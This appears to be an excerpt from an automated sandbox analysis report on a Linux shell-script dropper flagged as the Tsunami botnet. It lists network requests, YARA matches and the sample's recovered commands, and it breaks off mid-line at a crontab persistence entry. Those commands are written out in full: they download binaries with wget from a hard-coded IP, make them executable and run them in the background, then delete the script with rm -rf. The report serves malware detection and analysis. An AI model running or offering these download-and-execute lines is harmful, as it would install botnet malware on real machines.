        Source: global traffic, HTTP traffic detected: GET /.x/tty1 HTTP/1.1; User-Agent: Wget/1.17.1 (linux-gnu); Accept: */*; Accept-Encoding: identity; Host: 71.127.148.69; Connection: Keep-Alive
        Source: global traffic, HTTP traffic detected: GET /.x/tty2 HTTP/1.1; User-Agent: Wget/1.17.1 (linux-gnu); Accept: */*; Accept-Encoding: identity; Host: 71.127.148.69; Connection: Keep-Alive
        Source: global traffic, HTTP traffic detected: GET /.x/tty3 HTTP/1.1; User-Agent: Wget/1.17.1 (linux-gnu); Accept: */*; Accept-Encoding: identity; Host: 71.127.148.69; Connection: Keep-Alive
        Source: global traffic, HTTP traffic detected: GET /.x/tty4 HTTP/1.1; User-Agent: Wget/1.17.1 (linux-gnu); Accept: */*; Accept-Encoding: identity; Host: 71.127.148.69; Connection: Keep-Alive
        Source: global traffic, HTTP traffic detected: GET /.x/tty5 HTTP/1.1; User-Agent: Wget/1.17.1 (linux-gnu); Accept: */*; Accept-Encoding: identity; Host: 71.127.148.69; Connection: Keep-Alive
        Source: global traffic, HTTP traffic detected: GET /.x/tty6 HTTP/1.1; User-Agent: Wget/1.17.1 (linux-gnu); Accept: */*; Accept-Encoding: identity; Host: 71.127.148.69; Connection: Keep-Alive
        Source: global traffic, HTTP traffic detected: GET /.x/pty HTTP/1.1; User-Agent: Wget/1.17.1 (linux-gnu); Accept: */*; Accept-Encoding: identity; Host: 71.127.148.69; Connection: Keep-Alive
        Source: global traffic, HTTP traffic detected: GET /.x/irq0 HTTP/1.1; User-Agent: Wget/1.17.1 (linux-gnu); Accept: */*; Accept-Encoding: identity; Host: 71.127.148.69; Connection: Keep-Alive
        Source: global traffic, HTTP traffic detected: GET /.x/irq1 HTTP/1.1; User-Agent: Wget/1.17.1 (linux-gnu); Accept: */*; Accept-Encoding: identity; Host: 71.127.148.69; Connection: Keep-Alive
        Source: global traffic, HTTP traffic detected: GET /.x/irq2 HTTP/1.1; User-Agent: Wget/1.17.1 (linux-gnu); Accept: */*; Accept-Encoding: identity; Host: 71.127.148.69; Connection: Keep-Alive
        Source: 1.sh, String found in binary or memory: http://71.127.148.69/.x/irq0
        Source: 1.sh, String found in binary or memory: http://71.127.148.69/.x/irq1
        Source: 1.sh, String found in binary or memory: http://71.127.148.69/.x/irq2
        Source: 1.sh, String found in binary or memory: http://71.127.148.69/.x/pty
        Source: 1.sh, String found in binary or memory: http://71.127.148.69/.x/tty0
        Source: 1.sh, String found in binary or memory: http://71.127.148.69/.x/tty1
        Source: 1.sh, String found in binary or memory: http://71.127.148.69/.x/tty2
        Source: 1.sh, String found in binary or memory: http://71.127.148.69/.x/tty3
        Source: 1.sh, String found in binary or memory: http://71.127.148.69/.x/tty4
        Source: 1.sh, String found in binary or memory: http://71.127.148.69/.x/tty5
        Source: 1.sh, String found in binary or memory: http://71.127.148.69/.x/tty6

        System Summary:

        Malicious sample detected (through community Yara rule)
        Source: 8337.1.0000000008048000.000000000805c000.r-x.sdmp, type: MEMORY, Matched rule: LinuxTsunami, Author: unknown
        Source: 6287.1.0000000008048000.000000000805c000.r-x.sdmp, type: MEMORY, Matched rule: LinuxTsunami, Author: unknown
        Source: 4831.1.0000000008048000.000000000805c000.r-x.sdmp, type: MEMORY, Matched rule: LinuxTsunami, Author: unknown
        Source: 6311.1.0000000008048000.000000000805c000.r-x.sdmp, type: MEMORY, Matched rule: LinuxTsunami, Author: unknown
        Source: Initial sample, Potential command found: wget http://71.127.148.69/.x/tty0 -O /var/run/tty0 ; chmod +x /var/run/tty0 ; chmod 700 /var/run/tty0 ; /var/run/tty0 &
        Source: Initial sample, Potential command found: wget http://71.127.148.69/.x/tty1 -O /var/run/tty1 ; chmod +x /var/run/tty1 ; chmod 700 /var/run/tty1 ; /var/run/tty1 &
        Source: Initial sample, Potential command found: wget http://71.127.148.69/.x/tty2 -O /var/run/tty2 ; chmod +x /var/run/tty2 ; chmod 700 /var/run/tty2 ; /var/run/tty2 &
        Source: Initial sample, Potential command found: wget http://71.127.148.69/.x/tty3 -O /var/run/tty3 ; chmod +x /var/run/tty3 ; chmod 700 /var/run/tty3 ; /var/run/tty3 &
        Source: Initial sample, Potential command found: wget http://71.127.148.69/.x/tty4 -O /var/run/tty4 ; chmod +x /var/run/tty4 ; chmod 700 /var/run/tty4 ; /var/run/tty4 &
        Source: Initial sample, Potential command found: wget http://71.127.148.69/.x/tty5 -O /var/run/tty5 ; chmod +x /var/run/tty5 ; chmod 700 /var/run/tty5 ; /var/run/tty5 &
        Source: Initial sample, Potential command found: wget http://71.127.148.69/.x/tty6 -O /var/run/tty6 ; chmod +x /var/run/tty6 ; chmod 700 /var/run/tty6 ; /var/run/tty6 &
        Source: Initial sample, Potential command found: wget http://71.127.148.69/.x/pty -O pty ; chmod +x pty ; chmod 700 pty ; ./pty &
        Source: Initial sample, Potential command found: wget http://71.127.148.69/.x/irq0 -O irq0 ; chmod +x irq0 ; chmod 700 irq0 ; ./irq0 &
        Source: Initial sample, Potential command found: wget http://71.127.148.69/.x/irq1 -O irq1 ; chmod +x irq1 ; chmod 700 irq1 ; ./irq1 &
        Source: Initial sample, Potential command found: wget http://71.127.148.69/.x/irq2 -O irq2 ; chmod +x irq2 ; chmod 700 irq2 ; ./irq2 &
        Source: Initial sample, Potential command found: wget http://71.127.148.69/.x/pty -O /var/tmp/pty ; chmod +x /var/tmp/pty ; chmod 700 /var/tmp/pty ; /var/tmp/pty &
        Source: Initial sample, Potential command found: wget http://71.127.148.69/.x/pty -O /var/run/pty ; chmod +x /var/run/pty ; chmod 700 /var/run/pty ; /var/run/pty &
        Source: Initial sample, Potential command found: rm -rf /var/run/1sh
        Source: /usr/bin/killall (PID: 5985), SIGKILL sent: pid: 1339, result: successful
        Source: 8337.1.0000000008048000.000000000805c000.r-x.sdmp, type: MEMORY, Matched rule: LinuxTsunami, Description = Strings inside, Reference = http://www.kernelmode.info/forum/viewtopic.php?f=16&t=3483, Date = 2014/09/12, Author = @benkow_
        Source: 6287.1.0000000008048000.000000000805c000.r-x.sdmp, type: MEMORY, Matched rule: LinuxTsunami, Description = Strings inside, Reference = http://www.kernelmode.info/forum/viewtopic.php?f=16&t=3483, Date = 2014/09/12, Author = @benkow_
        Source: 4831.1.0000000008048000.000000000805c000.r-x.sdmp, type: MEMORY, Matched rule: LinuxTsunami, Description = Strings inside, Reference = http://www.kernelmode.info/forum/viewtopic.php?f=16&t=3483, Date = 2014/09/12, Author = @benkow_
        Source: 6311.1.0000000008048000.000000000805c000.r-x.sdmp, type: MEMORY, Matched rule: LinuxTsunami, Description = Strings inside, Reference = http://www.kernelmode.info/forum/viewtopic.php?f=16&t=3483, Date = 2014/09/12, Author = @benkow_
        Source: classification engine, Classification label: mal100.troj.evad.linSH@0/32@0/0

        Persistence and Installation Behavior:

        Executes the "crontab" command typically for achieving persistence
        Source: /bin/sh (PID: 5154), Crontab executable: <